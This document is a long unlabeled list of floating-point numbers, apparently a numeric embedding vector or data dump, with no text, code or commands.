0.025799384340643883, -0.017754582688212395, 0.0036567281931638718, 0.023154092952609062, 0.01688319258391857, -0.017443371936678886, -0.024601222947239876, 0.007854185067117214, -0.02668633684515953, 0.016898753121495247, 0.018034672364592552, -0.009523053653538227, -0.003872630884870887, 0.008612762205302715, -0.023356379941105843, -0.006049162242561579, -0.02245386689901352, -0.011242493987083435, -0.004948253743350506, 0.009554174728691578, -0.005193332210183144, 0.026063913479447365, 0.009180721826851368, 0.02234494313597679, -0.02688862383365631, -0.022780640050768852, -0.03809221461415291, -0.004100203979760408, 0.017894627526402473, -0.018797138705849648, -0.017318887636065483, 0.019139470532536507, -0.018828259781003, 0.0023438071366399527, -0.004142995458096266, -0.014541329815983772, -0.018906062468886375, -0.011857136152684689, -0.0010843755444511771, -0.005061067640781403, 0.03470001742243767, -0.00812260527163744, 0.03432656452059746, -0.014090074226260185, -0.03364190086722374, 0.028818130493164062, 0.014977025799453259, -0.010464467108249664, 0.018641533330082893, -0.012269490398466587, -0.020399875938892365, -0.0015969009837135673, -0.010417785495519638, 0.01573949307203293, -0.0146502535790205, 0.012456216849386692, 0.011654849164187908, -0.018034672364592552, 0.007963109761476517, 0.02872476726770401, -0.0004512558225542307, 0.009359668008983135, 0.03133893758058548, -0.006060832645744085, -0.030000733211636543, 0.0022835100535303354, 0.01583285629749298, 0.002217377768829465, -0.013514334335923195, 0.013739962130784988, -0.0035361340269446373, 0.015000366605818272, -0.013319827616214752, -0.008604981936514378, 0.03933706134557724, 0.0077219209633767605, 0.02383875660598278, 0.013210903853178024, 0.01725664548575878, 0.026437368243932724, -0.007437941152602434, -0.006656023673713207, -0.017147721722722054, -0.0039154221303761005, -0.027106471359729767, 0.02933162823319435, 0.0045514595694839954, 0.009110699407756329, -0.017178842797875404, -0.04621482267975807, 0.026297323405742645, -0.000377343239961192, 0.004224688280373812, -0.014051172882318497, 0.01943512260913849, 0.017209963873028755, 0.0036956295371055603, 0.03625607118010521, 0.021037857979536057, 0.0035011228173971176, 0.016058484092354774, 0.005278915166854858, -0.019014986231923103, 0.00825486984103918, 0.0014218449359759688, 0.00003276224379078485, 0.008581641130149364, -0.005337267182767391, -0.01132807694375515, 0.0019188098376616836, 0.0024313353933393955, -0.021240144968032837, 0.005333377048373222, 0.0005781715153716505, 0.01222280878573656, -0.016182968392968178, 0.017583416774868965, 0.009943189099431038, -0.004216908011585474, 0.004213017877191305, -0.008301551453769207, -0.007632447872310877, 0.0014558836119249463, 0.013708841055631638, 0.005862435791641474, 0.020975615829229355, 0.02895817533135414, -0.0141756571829319, 0.03160347044467926, 0.0019421506440266967, 0.00486656092107296, 0.016540860757231712, -0.006940003484487534, 0.006819409318268299, -0.016400815919041634, -0.027511045336723328, 0.014198997989296913, 0.005360607989132404, 0.014712495729327202, -0.0036411676555871964, -0.001431570271961391, -0.0022932353895157576, 0.01105576753616333, 0.007379588671028614, -0.0034777820110321045, -0.010386664420366287, 0.007893087342381477, 0.002213487634435296, 0.0226561538875103, 0.009717561304569244, 0.012215028516948223, 0.016463058069348335, 0.026748578995466232, 0.02204929292201996, 0.0009744791896082461, 0.006235888693481684, -0.016898753121495247, -0.010020991787314415, -0.010153256356716156, 0.008348233066499233, -0.000047775738494237885, 0.004446425940841436, 0.00002270259392389562, 0.018625972792506218, 0.01811247505247593, -0.0002579646825324744, -0.01551386434584856, 0.003293000627309084, 0.007671349216252565, -0.010215498507022858, 0.020228710025548935, -0.013646598905324936, -0.009437470696866512, -0.012067203409969807, -0.015000366605818272, 0.009297425858676434, 0.008075923658907413, 0.018221398815512657, 0.0009652401204220951, 0.00008740650082472712, 0.013086418621242046, 0.004917132668197155, -0.004644822794944048, 0.00866722408682108, -0.016712026670575142, -0.01949736475944519, -0.005232233554124832, 0.010627852752804756, -0.007546864915639162, -0.009134040214121342, -0.02377651445567608, -0.012744086794555187, 0.0013041682541370392, -0.001888661296106875, -0.03249042108654976, 0.0027055898681282997, 0.003145175287500024, -0.00010855912114493549, -0.007803613785654306, -0.038341183215379715, 0.001490894821472466, -0.005259464494884014, 0.013841105625033379, -0.01202052179723978, 0.004314161371439695, -0.01725664548575878, 0.01325758546590805, -0.008760587312281132, -0.0035594748333096504, -0.015467182733118534, -0.006278680171817541, -0.022578351199626923, -0.00337469344958663, -0.03217921033501625, -0.004718735348433256, 0.009165161289274693, -0.0004651144554372877, -0.025441491976380348, -0.009351887740194798, -0.008636103011667728, -0.011265834793448448, 0.005531773902475834, -0.026764139533042908, -0.0045242286287248135, 0.000804771960247308, -0.0007391259423457086, -0.000025772154913283885, 0.0012458162382245064, 0.013615477830171585, 0.017132161185145378, -0.014237899333238602, -0.0034913974814116955, -0.004508668091148138, 0.0056834896095097065, 0.0021570806857198477, -0.021209023892879486, -0.00018879318668041378, -0.01339763030409813, -0.0072356536984443665, 0.005656258203089237, -0.0035458593629300594, 0.0023340818006545305, -0.029689520597457886, -0.010970184579491615, 0.003526408690959215, -0.009779803454875946, 0.017925748601555824, 0.010347763076424599, -0.022391624748706818, -0.01020771823823452, -0.006278680171817541, -0.026748578995466232, -0.003077097935602069, 0.0028475800063461065, -0.010526709258556366, 0.003911531995981932, 0.012308391742408276, -0.011685970239341259, -0.01524155493825674, -0.014214558526873589, -0.011810454539954662, -0.025457052513957024, -0.008037022314965725, 0.01524155493825674, 0.010168816894292831, 0.017879066988825798, -0.012705185450613499, 0.0026414026506245136, 0.007659678813070059, -0.009600856341421604, -0.01325758546590805, 0.011483683250844479, 0.01966853067278862, 0.005846875254064798, -0.01871933601796627, -0.006270899903029203, 0.005185551941394806, -0.026219520717859268, -0.004742076154798269, 0.0076674590818583965, 0.003032361390069127, 0.016120726242661476, 0.033486295491456985, 0.01814359612762928, 0.0029156573582440615, -0.025394810363650322, 0.004423085134476423, -0.002913712291046977, 0.00745350169017911, 0.02944055199623108, -0.010020991787314415, 0.0038084436673671007, 0.013078638352453709, -0.00406130263581872, -0.0007337770075537264, -0.0014967300230637193, -0.00016204849816858768, 0.0035964311100542545, 0.014409065246582031, -0.0027639418840408325, 0.0023438071366399527, 0.010067673400044441, -0.0077219209633767605, -0.0063759335316717625, -0.00580797391012311, 0.005333377048373222, -0.008721685968339443, -0.015661688521504402, 0.0036061564460396767, 0.0023165761958807707, 0.004613701719790697, 0.004189677070826292, -0.010643413290381432, 0.012098324485123158, 0.007301785983145237, -0.0011125790188089013, -0.0038356746081262827, 0.010052112862467766, -0.011779333464801311, 0.016758708283305168, -0.0006841777358204126, -0.005076628178358078, -0.005321706645190716, -0.02024427056312561, -0.011693750508129597, 0.03048310987651348, 0.0146502535790205, 0.007196752354502678, 0.018361443653702736, 0.012534019537270069, 0.004271369893103838, 0.023154092952609062, -0.0030479219276458025, 0.01188825722783804, 0.007558535318821669, -0.00026282735052518547, -0.008962874300777912, 0.030981047078967094, 0.011654849164187908, 0.022702835500240326, 0.01983969658613205, 0.010658973827958107, -0.012316172011196613, -0.020493239164352417, -0.0008767395047470927, 0.013024176470935345, 0.00513887032866478, -0.00849605817347765, 0.01037888415157795, -0.0010396389989182353, 0.015490523539483547, -0.0009214760502800345, 0.011296955868601799, 0.014860321767628193, 0.016027363017201424, 0.010907942429184914, 0.009025116451084614, -0.005321706645190716, 0.013934468850493431, -0.005485092289745808, 0.010993525385856628, -0.01892162300646305, 0.003448606003075838, 0.00966309942305088, 0.014673594385385513, 0.00825486984103918, 0.0007036284077912569, -0.00013603320985566825, -0.01658754236996174, 0.004633152391761541, 0.004800428170710802, 0.01065119355916977, 0.016805389896035194, 0.008978434838354588, -0.007255104370415211, -0.003269659588113427, 0.01102464646100998, -0.00795143935829401, 0.012977494858205318, -0.002833964303135872, 0.011934938840568066, 0.005566785112023354, -0.027651090174913406, -0.018532609567046165, 0.000094335809990298, -0.005811864044517279, -0.012308391742408276, 0.007601326797157526, -0.007344577461481094, -0.011491463519632816, 0.0028748109471052885, 0.0008874373743310571, -0.0025772154331207275, -0.0169921163469553, -0.011289175599813461, 0.009523053653538227, 0.023340819403529167, -0.0036878492683172226, 0.043227195739746094, -0.0013936413452029228, -0.00002438933188386727, -0.0010347763309255242, -0.011538145132362843, -0.051225315779447556, 0.010721215978264809, -0.004559239838272333, 0.027277637273073196, 0.010168816894292831, -0.00886951107531786, 0.0014879772206768394, 0.011771553196012974, -0.008721685968339443, -0.008589421398937702, 0.004481437150388956, -0.01332760788500309, -0.0017486163415014744, 0.009266304783523083, 0.02590830810368061, 0.018268080428242683, -0.0032852203585207462, 0.008177067153155804, 0.013934468850493431, -0.006722155958414078, 0.008916192688047886, 0.004769307095557451, 0.0058702160604298115, 0.02085113152861595, 0.0044153048656880856, -0.011530364863574505, 0.002332136733457446, 0.005858545657247305, 0.02113122120499611, -0.0016387200448662043, -0.029985172674059868, -0.022407185286283493, -0.01722552441060543, 0.012059423141181469, 0.013420971110463142, 0.024679025635123253, -0.020571041852235794, 0.015109290368855, -0.02407216466963291, 0.035011228173971176, -0.005232233554124832, -0.0014889497542753816, 0.0026511279866099358, -0.004049632232636213, -0.012806328944861889, -0.005290585570037365, 0.010192157700657845, 0.019481804221868515, 0.020882252603769302, 0.0005883831181563437, 0.002812568563967943, 0.018159156665205956, -0.025394810363650322, -0.0036917394027113914, 0.010332202538847923, -0.006982794962823391, -0.014704715460538864, 0.005936348345130682, 0.012751867063343525, -0.0014675540151074529, 0.011911598034203053, -0.0005047452286817133, -0.006768837571144104, 0.0038570703472942114, 0.000617559184320271, 0.000016183576008188538, 0.01414453610777855, 0.013934468850493431, 0.007566315587610006, -0.01983969658613205, 0.017303327098488808, 0.02061772346496582, -0.00044882448855787516, -0.004808208905160427, -0.022391624748706818, -0.02760440856218338, 0.0004466362879611552, 0.01397337019443512, 0.01668090559542179, -0.023792074993252754, 0.007231763564050198, -0.0019586835987865925, -0.014269020408391953, -0.007309566251933575, 0.010822359472513199, 0.007317346520721912, 0.004084643442183733, 0.012145006097853184, -0.009810924530029297, 0.021380189806222916, -0.024803509935736656, 0.016712026670575142, -0.020835570991039276, -0.01949736475944519, -0.0006924442714080215, -0.005212782882153988, -0.001211777562275529, -0.010355543345212936, 0.0010532544692978263, 0.003082933137193322, -0.023916559293866158, 0.0034602764062583447, 0.013747742399573326, -0.01808135397732258, -0.0009793417993932962, 0.025659339502453804, 0.02248498797416687, 0.0012788823805749416, -0.009810924530029297, -0.01178711373358965, -0.00983426533639431, -0.021520234644412994, -0.002620006911456585, -0.021068979054689407, -0.0072084227576851845, -0.003485562279820442, 0.00712283980101347, 0.019077228382229805, 0.01990193873643875, -0.017552295699715614, 0.005597906187176704, -0.006278680171817541, -0.0019285351736471057, 0.0321480892598629, 0.02492799423635006, 0.024632344022393227, -0.01003655232489109, -0.0044153048656880856, 0.02302960865199566, -0.007698580157011747, -0.026561852544546127, -0.015031487680971622, -0.012082763947546482, 0.0033280118368566036, -0.013763302937150002, 0.014160096645355225, -0.003736476181074977, -0.01627633161842823, 0.00333968224003911, -0.004119654651731253, -0.010744556784629822, -0.018781578168272972, 0.011942719109356403, -0.006566550582647324, 0.00667936448007822, 0.0005567757762037218, 0.00008102424908429384, -0.014160096645355225, -0.011973840184509754, 0.0032852203585207462, 0.00966309942305088, 0.011631508357822895, 0.006364263128489256, -0.042947106063365936, 0.025923868641257286, -0.00510385911911726, 0.011981620453298092, 0.015070389024913311, 0.010573390871286392, -0.009188502095639706, -0.019217273220419884, 0.012705185450613499, -0.006628792732954025, 0.005520103499293327, -0.018968304619193077, -0.015918439254164696, 0.02018202841281891, 0.005823534447699785, 0.016431936994194984, -0.012580701150000095, -0.000896190176717937, -0.003222977975383401, 0.030529791489243507, 0.012650723569095135, 0.026141716167330742, 0.010122135281562805, -0.005473421886563301, 0.017816824838519096, 0.004142995458096266, -0.02380763553082943, -0.00030197185697034, -0.00859720166772604, -0.004030181560665369, 0.013078638352453709, -0.013070858083665371, 0.005792413372546434, 0.029782885685563087, -0.017583416774868965, -0.027137592434883118, -0.0054345205426216125, 0.005784633103758097, -0.014914783649146557, 0.009577515535056591, -0.012611822225153446, 0.01753673516213894, 0.012285050936043262, 0.0041235447861254215, -0.0015424391021952033, 0.005481202155351639, 0.015085949562489986, 0.02156691625714302, -0.04272925853729248, 0.031759075820446014, -0.008402694948017597, -0.025285886600613594, -0.006710485555231571, -0.028429117053747177, -0.0011728761019185185, 0.007441831286996603, 0.008550520054996014, 0.0009287701104767621, -0.009974310174584389, -0.00044469122076407075, 0.0010182432597503066, 0.002981789642944932, -0.0217692032456398, 0.0009910123189911246, -0.012137225829064846, -0.01300861593335867, 0.021582476794719696, -0.010332202538847923, 0.029082659631967545, -0.026203958317637444, -0.012098324485123158, -0.019855257123708725, 0.029191583395004272, 0.028802569955587387, -0.004870451055467129, -0.018703775480389595, 0.0008431870955973864, -0.008612762205302715, -0.0022932353895157576, -0.018999425694346428, -0.005504542961716652, 0.0038609604816883802, 0.01239397469907999, -0.01414453610777855, 0.009453031234443188, 0.028880372643470764, 0.002044266788288951, 0.002882591215893626, 0.02262503281235695, -0.0024410607293248177, 0.011359198950231075, -0.02869364619255066, -0.031214455142617226, -0.011755992658436298, 0.0024274452589452267, -0.005313926376402378, -0.028102345764636993, -0.004224688280373812, 0.009989870712161064, 0.003503067884594202, -0.009896507486701012, -0.016571981832385063, 0.02136462926864624, 0.013413190841674805, -0.004294710699468851, -0.008604981936514378, 0.015599447302520275, 0.009655319154262543, 0.016743147745728493, -0.02573714219033718, -0.01817471720278263, -0.013296486809849739, -0.024974675849080086, 0.00862832274287939, 0.005189442075788975, -0.0024041044525802135, -0.0006044299807399511, 0.010845700278878212, -0.00611140439286828, -0.014588011428713799, -0.006936113350093365, -0.0075079635716974735, -0.009196282364428043, -0.013950029388070107, 0.015171532519161701, -0.0033221766352653503, -0.015747273340821266, 0.012059423141181469, 0.0077763828448951244, -0.002765886951237917, -0.020944494754076004, -0.007173411548137665, -0.008877291344106197, 0.004248029086738825, -0.011063547804951668, -0.006869981065392494, -0.005395619198679924, -0.002213487634435296, -0.0036061564460396767, -0.007616887334734201, 0.02499023638665676, 0.0060841734521090984, 0.01010657474398613, 0.014432406052947044, -0.007165631279349327, -0.0029487235005944967, 0.00011402962263673544, 0.00570683041587472, 0.021317947655916214, 0.014331262558698654, -0.017490053549408913, 0.004395854193717241, -0.008363793604075909, -0.00214930041693151, -0.016696466132998466, -0.014759177342057228, -0.005609576590359211, 0.0006963344058021903, -0.00631758151575923, -0.0047109550796449184, 0.008044802583754063, 0.0018624028889462352, 0.011141350492835045, -0.0007931015570648015, -0.0008757669711485505, 0.008480497635900974, 0.009740902110934258, 0.01923283562064171, 0.004539789166301489, 0.028086785227060318, -0.034575533121824265, 0.009982090443372726, -0.01461913250386715, 0.0035594748333096504, -0.003063482465222478, 0.001934370375238359, -0.025628218427300453, 0.004528118763118982, -0.021380189806222916, 0.016727587208151817, 0.0017816824838519096, 0.003800663398578763, -0.01551386434584856, -0.0020112006459385157, 0.01719440333545208, -0.01570837013423443, -0.014393504709005356, 0.002213487634435296, 0.01551386434584856, -0.012751867063343525, -0.020306512713432312, -0.0004979374934919178, 0.03154122829437256, -0.012557360343635082, 0.019824136048555374, -0.011942719109356403, 0.004329721909016371, 0.015506084077060223, -0.013459872454404831, 0.018937183544039726, -0.020026423037052155, 0.01952848583459854, 0.004621481988579035, -0.019139470532536507, -0.014307921752333641, -0.03242817893624306, -0.020337633788585663, 0.004889901727437973, 0.019046107307076454, -0.0027269856072962284, 0.01414453610777855, -0.015599447302520275, 0.015747273340821266, 0.009312986396253109, 0.010231059044599533, 0.02777557447552681, -0.0015949559165164828, 0.014409065246582031, -0.0006608369294553995, 0.007216203026473522, 0.02024427056312561, 0.008457156829535961, -0.0010415840661153197, -0.014385724440217018, -0.0022154327016323805, -0.006819409318268299, 0.0020598273258656263, 0.007002245634794235, -0.0005198194994591177, -0.020368754863739014, 0.002606391441076994, -0.005399509333074093, 0.01688319258391857, 0.00667936448007822, 0.0010600622044876218, -0.012642943300306797, -0.02461678348481655, 0.0033319019712507725, 0.024305572733283043, -0.029051538556814194, 0.020695526152849197, -0.013070858083665371, 0.0011923267738893628, 0.007955329492688179, -0.003927092533558607, -0.01909278891980648, 0.0067027052864432335, -0.0077919433824718, -0.01831476204097271, 0.006150305736809969, 0.0008806296391412616, -0.023340819403529167, 0.01903054676949978, -0.004267479758709669, 0.0001536603958811611, -0.0049560340121388435, -0.0023243564646691084, -0.01906166784465313, 0.014362383633852005, 0.01834588311612606, -0.025223644450306892, -0.0026550181210041046, 0.014237899333238602, -0.013467652723193169, 0.008247089572250843, -0.006659913808107376, -0.010425565764307976, -0.0007138400687836111, 0.005800193641334772, 0.001778764883056283, -0.01722552441060543, 0.009367448277771473, 0.027355439960956573, -0.00769079988822341, -0.022998487576842308, -0.010394444689154625, -0.0001321430754614994, -0.0074807326309382915, -0.015124850906431675, -0.000013972579836263321, 0.0005130117642693222, 0.01339763030409813, -0.007294005714356899, 0.01696099527180195, -0.009453031234443188, 0.03242817893624306, 0.013646598905324936, -0.0048237694427371025, 0.0034174849279224873, 0.0035147382877767086, -0.002240718575194478, -0.004349172580987215, -0.005586235783994198, -0.030981047078967094, 0.0045242286287248135, 0.009157381020486355, -0.011841575615108013, -0.006379823666065931, -0.007251214236021042, -0.0026491829194128513, -0.01212166529148817, -0.00859720166772604, 0.008161506615579128, 0.01266628410667181, -0.00990428775548935, -0.011600387282669544, -0.005492872558534145, 0.0032346483785659075, 0.03936818242073059, 0.005072738043963909, 0.010604511946439743, -0.008037022314965725, 0.018766017630696297, 0.00624755909666419, 0.007329016923904419, -0.002721150405704975, 0.007118949666619301, 0.0003316341317258775, 0.006562660448253155, -0.012417315505445004, 0.005181661807000637, 0.0043647331185638905, -0.010246619582176208, 0.02211153507232666, -0.014012271538376808, -0.0014092018827795982, -0.008262650109827518, -0.005940238479524851, 0.0236987117677927, 0.008706125430762768, -0.022376064211130142, -0.001692209392786026, 0.0021784764248877764, -0.010472247377038002, -0.000896190176717937, -0.010728996247053146, -0.03177463635802269, 0.01716328226029873, 0.004376403521746397, 0.023278577253222466, -0.000855343765579164, 0.018268080428242683, 0.0030381965916603804, -0.01137475948780775, 0.014743616804480553, -0.001416982151567936, 0.014588011428713799, -0.009873166680335999, 0.009281865321099758, 0.00879948865622282, -0.005337267182767391, -0.017101040109992027, 0.011180251836776733, 0.008612762205302715, 0.009507493115961552, 0.031556788831949234, -0.007577985990792513, -0.009950969368219376, 0.021053418517112732, -0.004936583340167999, 0.0013557125348597765, 0.008690564893186092, 0.016805389896035194, -0.017350008711218834, 0.011903817765414715, 0.014774737879633904, 0.009756462648510933, 0.014572450891137123, 0.02007310464978218, -0.018159156665205956, 0.008542739786207676, 0.023620909079909325, 0.0021415201481431723, -0.011934938840568066, 0.007282335311174393, -0.006473186891525984, 0.003662563394755125, -0.00046535758883692324, 0.008993995375931263, -0.014953684993088245, -0.0031490654218941927, -0.0013634928036481142, -0.009281865321099758, -0.0012283106334507465, -0.0077491519041359425, -0.0014558836119249463, 0.012806328944861889, 0.011553705669939518, 0.009336327202618122, 0.006928333081305027, -0.0020734427962452173, 0.020866692066192627, -0.011584826745092869, 0.0006725073326379061, -0.009102919138967991, -0.0008213050896301866, 0.0071267299354076385, -0.021520234644412994, -0.0035555846989154816, 0.0090017756447196, -0.009608636610209942, 0.022236019372940063, 0.0022737847175449133, -0.00046341249253600836, -0.013996711000800133, -0.0019684091676026583, -0.017007676884531975, -0.01685207150876522, 0.01650973968207836, 0.0016640059184283018, 0.01935731992125511, -0.0021843116264790297, -0.005469531752169132, -0.02312297187745571, 0.022204898297786713, 0.007823063991963863, -0.012915252707898617, 0.019855257123708725, -0.0034097046591341496, 0.0035516945645213127, 0.0031840766314417124, 0.014214558526873589, 0.025830505415797234, -0.012534019537270069, 0.0020792779978364706, 0.002752271480858326, -0.005730171222239733, 0.020057544112205505, 0.021473553031682968, -0.017847945913672447, 0.018812699243426323, -0.022905124351382256, 0.00917294155806303, 0.008200407959520817, 0.022765079513192177, 0.0014296252047643065, 0.00842603575438261, -0.0011213318211957812, -0.02122458443045616, -0.005158321000635624, 0.006033601704984903, 0.009507493115961552, 0.004395854193717241, -0.009032896719872952, 0.013459872454404831, 0.003995170351117849, -0.007842514663934708, 0.019450683146715164, 0.008612762205302715, -0.007601326797157526, -0.00463704252615571, 0.013374289497733116, -0.003333847038447857, 0.005473421886563301, -0.008285990916192532, -0.0010581171372905374, -0.018563730642199516, 0.04372513294219971, 0.028273511677980423, 0.0014335153391584754, -0.01963740959763527, -0.03169683367013931, -0.007869746536016464, -0.019621849060058594, 0.0017184677999466658, 0.022064853459596634, 0.0058429851196706295, -0.026359565556049347, 0.002026761183515191, -0.008402694948017597, 0.014728056266903877, 0.0264529287815094, 0.0044425358064472675, 0.002528588753193617, 0.007893087342381477, -0.005146650597453117, 0.014012271538376808, 0.007698580157011747, -0.01482141949236393, 0.03298835828900337, 0.024025483056902885, -0.0060841734521090984, -0.004532008897513151, -0.010923502966761589, 0.0039154221303761005, 0.011530364863574505, -0.012534019537270069, -0.01541272085160017, -0.009134040214121342, -0.018766017630696297, 0.032303694635629654, 0.010324422270059586, -0.00006528135418193415, 0.008791708387434483, 0.009624198079109192, -0.0030673725996166468, 0.013312047347426414, 0.01952848583459854, 0.006897212006151676, 0.010114355012774467, 0.020290952175855637, -0.0274021215736866, 0.017272206023335457, -0.0011855190386995673, 0.004893791861832142, -0.010534489527344704, -0.0017350008711218834, 0.01865709386765957, -0.0011485627619549632, 0.026810821145772934, -0.006410944741219282, -0.0029798445757478476, -0.011195812374353409, -0.0019013042328879237, -0.0076946900226175785, 0.0008110934286378324, -0.00309071340598166, -0.008099264465272427, 0.0021337398793548346, 0.010495588183403015, 0.029487233608961105, -0.014634693041443825, 0.0013323717284947634, -0.039866119623184204, 0.006387603934854269, 0.004944363608956337, -0.029627278447151184, 0.02993849106132984, -0.02584606595337391, -0.00412743492051959, -0.003347462508827448, -0.014977025799453259, -0.004465876612812281, -0.023107411339879036, -0.023014048114418983, 0.0003525436040945351, -0.02004198357462883, -0.011398100294172764, -0.008356013335287571, -0.01524155493825674, 0.0039504338055849075, 0.005804083775728941, 0.005166101269423962, -0.018843820318579674, 0.012923032976686954, 0.013887787237763405, -0.007496293168514967, 0.010324422270059586, 0.010464467108249664, -0.0022115425672382116, -0.004625372122973204, 0.0002269651449751109, 0.0001410174445481971, 0.006737716495990753, -0.031992483884096146, -0.00359448604285717, 0.03320620581507683, 0.0047381860204041, -0.0072084227576851845, -0.013848885893821716, -0.0017525064758956432, 0.029362749308347702, -0.045592401176691055, 0.005936348345130682, -0.016120726242661476, -0.001993695041164756, -0.01493812445551157, 0.029253825545310974, 0.000777541019488126, -0.010161036625504494, 0.0036645084619522095, 0.01969965174794197, -0.014323482289910316, -0.00729011557996273, -0.006224218290299177, 0.004582580644637346, -0.0007148126023821533, 0.006726046092808247, -0.0002861681568901986, 0.019077228382229805, -0.015070389024913311, 0.018906062468886375, 0.026328444480895996, -0.010487807914614677, -0.009025116451084614, -0.009118479676544666, 0.0026355674490332603, -0.004808208905160427, -0.0006457626586779952, -0.004465876612812281, 0.00009482207678956911, -0.009880946949124336, 0.011429221369326115, -0.007873636670410633, 0.002826184034347534, -0.005609576590359211, 0.0038064986001700163, 0.007033366709947586, 0.027122031897306442, 0.004142995458096266, -0.0017670944798737764, -0.006193097215145826, -0.0235742274671793, 0.014230119064450264, -0.012712965719401836, -0.021691400557756424, 0.000354245537891984, -0.0018769908929243684, -0.0099354088306427, 0.007714140694588423, -0.013794424012303352, 0.01259626168757677, 0.006566550582647324, 0.016665345057845116, -0.010861260816454887, -0.01630745269358158, -0.026577413082122803, -0.0016426101792603731, 0.0021142892073839903, -0.015319357626140118, -0.011040206998586655, -0.012821889482438564, 0.019155031070113182, 0.0030420867260545492, -0.00228545512072742, 0.0067299362272024155, -0.010503368452191353, -0.002483852207660675, -0.0034135947935283184, -0.03883912414312363, -0.0023107409942895174, 0.024663465097546577, 0.01920171268284321, 0.012277270667254925, 0.006344812456518412, -0.0026919743977487087, -0.019824136048555374, 0.010573390871286392, -0.02838243544101715, 0.004224688280373812, -0.007371808402240276, -0.003841509809717536, -0.004703174810856581, 0.014455746859312057, -0.014416845515370369, -0.00980314426124096, -0.015677249059081078, 0.001468526548705995, 0.004959924146533012, 0.01770790107548237, 0.01434682309627533, -0.006558770313858986, 0.011584826745092869, 0.009149600751698017, 0.010059893131256104, -0.004318051505833864, 0.010518928989768028, 0.010791238397359848, 0.0090017756447196, 0.011997180990874767, 0.009297425858676434, 0.0004194053472019732, 0.024103285744786263, 0.00470706494525075, 0.004812099039554596, -0.007064487785100937, -0.0006710485322400928, -0.0024041044525802135, 0.010145476087927818, -0.008908412419259548, 0.02130238711833954, 0.014051172882318497, 0.012417315505445004, -0.024632344022393227, 0.0036372775211930275, 0.009725341573357582, -0.006811629049479961, -0.0007089773425832391, -0.0198085755109787, 0.013794424012303352, 0.0022484988439828157, -0.006239778827875853, -0.00951527338474989, 0.001971326768398285, -0.0017758472822606564, -0.020166467875242233, 0.0036975746043026447, -0.015124850906431675, 0.019217273220419884, 0.0029876248445361853, 0.014564670622348785, 0.015451622195541859, 0.033797506242990494, 0.005601796321570873, -0.015218214131891727, -0.006126964930444956, 0.010526709258556366, -0.0009239073842763901, 0.0070761581882834435, -0.012907472439110279, -0.004547569435089827, 0.011265834793448448, -0.005722390953451395, -0.009048457257449627, 0.015397160314023495, 0.008099264465272427, -0.011872696690261364, -0.014728056266903877, 0.007399039342999458, -0.00047994559281505644, 0.02038431540131569, 0.003981554880738258, 0.005282805301249027, -0.004216908011585474, -0.02432113327085972, -0.0064031644724309444, 0.001221502898260951, 0.014494648203253746, 0.01854817010462284, 0.00496770441532135, 0.03320620581507683, 0.02573714219033718, 0.01952848583459854, -0.004034071695059538, 0.001815721159800887, 0.0023807634133845568, -0.00897065456956625, 0.007706360425800085, 0.007624667603522539, 0.012705185450613499, 0.020290952175855637, 0.002738656010478735, -0.011437001638114452, 0.019855257123708725, 0.004917132668197155, 0.0026919743977487087, 0.014712495729327202, 0.008410475216805935, -0.02499023638665676, -0.01871933601796627, -0.005022166296839714, 0.018221398815512657, 0.0008777120383456349, -0.010339982807636261, 0.004135215189307928, -0.0060841734521090984, -0.0004344796179793775, 0.022578351199626923, 0.006231998559087515, 0.0011864915722981095, 0.014696935191750526, 0.014953684993088245, -0.02435225434601307, -0.030125217512249947, 0.018252519890666008, 0.018330322578549385, 0.013957809656858444, -0.007803613785654306, -0.0043647331185638905, 0.02004198357462883, -0.010495588183403015, -0.00021736137568950653, -0.010565610602498055, 0.016929874196648598, 0.007566315587610006, -0.006671584211289883, 0.0050649577751755714, -0.007083938457071781, -0.025488173589110374, 0.005232233554124832, -0.0013313991948962212, -0.00604527210816741, -0.004135215189307928, 0.017521174624562263, -0.01414453610777855, -0.011242493987083435, -0.004088533576577902, -0.008247089572250843, 0.022360503673553467, -0.029113780707120895, -0.012347293086349964, -0.009686440229415894, 0.0014237900031730533, -0.024974675849080086, 0.005508433096110821, -0.009484152309596539, 0.01198940072208643, -0.01932619884610176, 0.002991514978930354, 0.02604835294187069, -0.0019402055768296123, 0.01222280878573656, -0.00954639445990324, -0.009258524514734745, 0.005986920092254877, 0.006072503048926592, -0.005212782882153988, -0.005158321000635624, 0.007391259074211121, 0.0007994230254553258, -0.002697809599339962, 0.003975719679147005, 0.011553705669939518, -0.002153190551325679, 0.005652368068695068, 0.0038026084657758474, -0.01112578995525837, 0.02208041399717331, 0.004275260027498007, -0.006792178377509117, 0.01736556924879551, 0.02400992251932621, -0.004528118763118982, 0.007216203026473522, -0.009188502095639706, -0.0027094800025224686, -0.00004750221341964789, 0.004532008897513151, -0.021629158407449722, 0.010067673400044441, -0.004835439845919609, -0.005247794091701508, 0.0013498773332685232, 0.0008864648407325149, -0.009950969368219376, 0.0029973501805216074, 0.0217692032456398, 0.0208200104534626, -0.010814579203724861, -0.002826184034347534, -0.00641872501000762, -0.01137475948780775, 0.006477077025920153, 0.002977899508550763, 0.023511985316872597, 0.004605921451002359, 0.010907942429184914, -0.00020143612346146256, -0.02444561757147312, -0.03638055548071861, 0.006049162242561579, 0.03317508473992348, 0.00986538641154766, -0.0169921163469553, 0.011382539756596088, -0.002322411397472024, -0.008044802583754063, -0.017116600647568703, 0.003635332453995943, 0.010433346033096313, 0.02268727496266365, 0.017925748601555824, 0.012915252707898617, -0.01095462404191494, 0.0207577683031559, 0.016385255381464958, -0.014020051807165146, 0.01458023115992546, -0.028195708990097046, 0.01647861860692501, 0.008138165809214115, 0.001851704902946949, -0.010993525385856628, -0.001463663880713284, -0.017272206023335457, -0.0077997236512601376, 0.0019470133120194077, 0.04123544692993164, 0.026966426521539688, 0.014836980029940605, 0.010518928989768028, -0.008231529034674168, 0.0046564931981265545, 0.0005655285785906017, 0.00412743492051959, -0.0014539385447278619, 0.008737246505916119, -0.008075923658907413, 0.01085348054766655, 0.014572450891137123, -0.009538614191114902, 0.05673374980688095, 0.01259626168757677, 0.009989870712161064, 0.006858310662209988, -0.008838390000164509, 0.00712283980101347, 0.003333847038447857, -0.005753512028604746, -0.03024970181286335, 0.01630745269358158, -0.003466111607849598, 0.0002284239453729242, 0.015117070637643337, -0.018470367416739464, -0.009740902110934258, -0.018330322578549385, -0.010900162160396576, -0.011211372911930084, -0.02268727496266365, -0.022220458835363388, 0.010301081463694572, -0.0018089134246110916, 0.012479557655751705, -0.0032268681097775698, 0.008433816023170948, 0.00859720166772604, 0.003800663398578763, -0.0014529660111293197, -0.009421910159289837, -0.028506919741630554, 0.01447908766567707, -0.003934873268008232, -0.0014986750902608037, 0.009686440229415894, 0.01997974142432213, 